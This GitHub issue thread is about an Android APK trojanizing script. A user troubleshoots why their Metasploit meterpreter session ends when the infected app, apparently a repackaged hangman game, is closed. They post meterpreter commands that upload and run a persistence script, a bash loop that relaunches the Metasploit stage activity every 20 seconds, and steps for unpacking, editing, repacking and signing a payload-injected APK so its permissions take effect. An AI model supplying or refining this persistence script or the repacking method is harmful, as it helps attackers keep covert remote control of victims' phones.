session terminates when app is closed #3

karpiyon · 2022-03-07T15:55:09Z

I managed to run your script, had to use apktool instead of "./Tools/apktool.jar"
When I run the app I get a session.
I do:

cd /
cd sdcard
upload PersistanceScript.sh

shell
sh PersistanceScript.sh
CRTL +C

However, after i close the app my session dies.

meterpreter > shell
Process 1 created.
Channel 2 created.
sh ./PersistenceScript.sh
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=by.dustteam.hangman/.vkcbc.Zxdrv }
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=by.dustteam.hangman/.vkcbc.Zxdrv }

The text was updated successfully, but these errors were encountered:

rohitnishad613 · 2022-03-07T16:58:16Z

I am not actively maintaining this repo. PR are also welcome.

…

On Mon, 7 Mar, 2022, 9:25 pm karpiyon, ***@***.***> wrote: I managed to run your script, had to use apktool instead of "./Tools/apktool.jar" When I run the app I get a session. I do: cd / cd sdcard upload PersistanceScript.sh shell sh PersistanceScript.sh CRTL +C However, after i close the app my session dies. meterpreter > shell Process 1 created. Channel 2 created. sh ./PersistenceScript.sh Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=by.dustteam.hangman/.vkcbc.Zxdrv } Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=by.dustteam.hangman/.vkcbc.Zxdrv } — Reply to this email directly, view it on GitHub <#3>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ALGUWV6TPFO3YF4FBNM254DU6YRHPANCNFSM5QDWNLUQ> . Triage notifications on the go with GitHub Mobile for iOS <https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675> or Android <https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub>. You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

karpiyon · 2022-03-07T17:32:32Z

there is a bug/fault in recent mesfvenom injection method, or perhaps this is in teh apktool.
In any case the problem is that the new injected permissions are not respected when you install the new app with the payload.

To overcome this you need to unpack the injected apk, modify it's apktool.yml, pack and sign.

Do you know how to use this script when you inject a payload manually?

#!/bin/bash
while true
	do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
	sleep 20
done

It only works for a "stand alone" payload but when I add it myself, without obfuscating, it does not.
I use this method:

https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

session terminates when app is closed #3

session terminates when app is closed #3

karpiyon commented Mar 7, 2022 •

edited

Loading

rohitnishad613 commented Mar 7, 2022 via email •

edited

Loading

karpiyon commented Mar 7, 2022

session terminates when app is closed #3

session terminates when app is closed #3

Comments

karpiyon commented Mar 7, 2022 • edited Loading

rohitnishad613 commented Mar 7, 2022 via email • edited Loading

karpiyon commented Mar 7, 2022

karpiyon commented Mar 7, 2022 •

edited

Loading

rohitnishad613 commented Mar 7, 2022 via email •

edited

Loading